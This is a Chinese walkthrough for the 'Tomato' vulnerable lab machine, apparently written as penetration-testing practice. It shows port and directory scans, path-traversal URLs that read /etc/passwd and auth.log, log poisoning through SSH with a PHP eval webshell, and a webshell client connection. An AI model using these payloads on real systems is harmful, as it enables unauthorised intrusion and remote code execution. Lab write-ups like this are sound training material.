Tomato-文件包含漏洞靶机-通关攻略
Tomato 文件包含漏洞靶机 通关攻略
下载靶机ova文件,下载地址:
解压导入VMware,修改该虚拟机的网卡模式为NAT模式。
1. 打开虚拟机Tomato
2. 打开kali,nmap扫描主机,寻找靶机ip
判断出靶机ip为192.168.182.153,同时ftp 21端口、http 80端口、sun-answerbook 8888端口状态均是开启。
3. 浏览器访问ip以及可利用的端口80 、 8888
ip:80端口
ip:8888端口 出现输入框
4. 使用kali的dirb进行目录扫描
输入:dirb “http://192.168.182.153”
发现 /antibot_image/ index.html server-status
5.依次访问/antibot_image/ 、 index.html 、 server-status
发现存在目录
无权限访问
6.进一步查看/antibot_image/的目录
发现一个info.php文件
点击info.php文件,发现有PHP信息,显示:Linux系统,/etc/
发现:存在allow_url_fopen On,allow_url_include Off .
7.查看 info.php页面的源代码
【allow_url_include Off】,发现include()高危函数,可能存在文件包含漏洞
参数
8. include通过GET方式传image参数
image参数赋值查看/etc/passwd用户配置文件
根据上图,判断路径为:../../../../../etc/passwd
如果判断不清,可以一层一层往外切,每一个../向上一级切换一层
输入:http://192.168.182.153/antibot_image/antibots/info.php?image=../../../../../etc/passwd
在页面最下方发现,文件内容显示在页面上 则存在文件包含漏洞
9.利用文件包含漏洞,查看日志文件
输入:http://192.168.182.153/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log
10. 查看远程连接ssh端口是否开始
kali,输入:nmap -A -T4 -p- 192.168.182.153
-A:使用所有高级扫描选项
-T4:设置时许,越高扫描越快
-p-:全端口扫描
发现ssh端口是开启的,2211
11. 利用远程连接端口ssh 2211和日志记录,写入一句话木马
URL输入:http://192.168.182.153:2211/
再次查看日志:
http://192.168.182.153/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log
发现木马:‘GET /%3C?php%20@eval($_POST[%27cmd%27]);?%3E HTTP/1.1’
12. 使用蚁剑连接 查看日志的网址
在查看日志的页面已经写入完整的一句话木马,使用蚁剑进行连接。
参考其他技术分享,进行练习
Tomato 文件包含靶机 练习结束
练习中存在一些磕磕绊绊,结果得到的有点曲折。
即使对大家有一点点帮助,
拜拜! ————–2025/3/12 23:21